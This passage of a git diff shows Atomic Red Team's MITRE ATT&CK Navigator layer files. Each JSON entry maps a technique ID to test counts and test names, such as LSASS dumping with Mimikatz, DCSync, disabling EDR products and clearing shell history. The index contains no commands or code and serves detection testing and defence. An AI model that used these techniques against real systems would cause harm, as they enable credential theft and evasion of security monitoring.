Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":1,"enabled":true,"comment":"\n- rm -rf\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":6,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear Bash history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear history of a bunch of shells\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":2,"enabled":true,"comment":"\n- Delete a single file - Linux/macOS\n- Delete an entire folder - Linux/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":1,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.003","score":4,"enabled":true,"comment":"\n- Create local account with admin privileges - MacOS\n- Create local account with admin privileges using sysadminctl utility - MacOS\n- Enable root account using dsenableroot utility - MacOS\n- Add a new/existing user to the admin group using dseditgroup utility - macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":5,"enabled":true,"comment":"\n- System Information Discovery\n- List OS Information\n- Hostname Discovery\n- Environment variables discovery on macos and linux\n- Show System Integrity Protection status (MacOS)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":5,"enabled":true,"comment":"\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Enumerate users and groups\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":2,"enabled":true,"comment":"\n- Connection Proxy\n- Connection Proxy for macOS UI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":1,"enabled":true,"comment":"\n- Tor Proxy Usage - MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":7,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- SSH Credential Stuffing From MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Screencapture\n- Screencapture (silent)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Execute commands from clipboard\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1123","score":1,"enabled":true,"comment":"\n- using Quicktime Player\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":1,"enabled":true,"comment":"\n- System Time Discovery in macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- Base64 Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":1,"enabled":true,"comment":"\n- Network Share Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a user account on a MacOS system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1140","score":5,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":4,"enabled":true,"comment":"\n- Chrome (Developer Mode)\n- Chrome (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine password policy - macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":3,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on macOS\n- List Google Chrome Bookmark JSON Files on macOS\n- List Safari Bookmarks on MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":11,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- Chmod through c script\n- Chown through c script\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":1,"enabled":true,"comment":"\n- Detect Virtualization Environment (MacOS)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Safari Browser Version\n"},{"techniqueID":"T1518.001","score":1,"enabled":true,"comment":"\n- Security Software Discovery - ps (macOS)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Restart System via `shutdown` - macOS/Linux\n- Shutdown System via `shutdown` - macOS/Linux\n- Restart System via `reboot` - macOS/Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"comment":"\n- Launch Agent\n- Event Monitor Daemon Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"comment":"\n- Launch Daemon\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":2,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":2,"enabled":true,"comment":"\n- Trap EXIT\n- Trap SIGINT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"comment":"\n- Persistance with Event Monitor - emond\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":2,"enabled":true,"comment":"\n- MacOS - Load Kernel Module via kextload and kmutil\n- MacOS - Load Kernel Module via KextManagerLoadKextWithURL()\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"comment":"\n- Copy in loginwindow.plist for Re-Opened Applications\n- Re-Opened Applications using LoginHook\n- Append to existing loginwindow for Re-Opened Applications\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Add macOS LoginItem using Applescript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":3,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Set a SetUID flag on file\n- Set a SetGID flag on file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":3,"enabled":true,"comment":"\n- Sudo usage\n- Unlimited sudo cache timeout\n- Disable tty_tickets for sudo caching\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":3,"enabled":true,"comment":"\n- Extract Browser and System credentials with LaZagne\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":1,"enabled":true,"comment":"\n- Search Through Bash History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":3,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with rsync\n- Copy the users GnuPG directory with rsync\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"comment":"\n- Gatekeeper Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":1,"enabled":true,"comment":"\n- Install root CA on macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":1,"enabled":true,"comment":"\n- Keychain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":2,"enabled":true,"comment":"\n- Search macOS Safari Cookies\n- Simulating Access to Chrome Login Data - MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":5,"enabled":true,"comment":"\n- Disable Carbon Black Response\n- Disable LittleSnitch\n- Disable OpenDNS Umbrella\n- Disable macOS Gatekeeper\n- Stop and unload Crowdstrike Falcon on macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":2,"enabled":true,"comment":"\n- Disable history collection\n- Mac HISTCONTROL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n- Mac Hidden file\n- Hidden files\n- Hide a Directory\n- Show all hidden files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":2,"enabled":true,"comment":"\n- Create Hidden User using UniqueID < 500\n- Create Hidden User using IsHidden option\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"comment":"\n- Launchctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":1,"enabled":true,"comment":"\n- Dylib Injection via DYLD_INSERT_LIBRARIES\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"comment":"\n- Plist Modification\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 57ba8375..74cdfb18 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Windows)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":37,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":12,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":2,"enabled":true,"comment":"\n- Query Registry\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-wmiobject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":3,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":1,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1033","score":4,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- 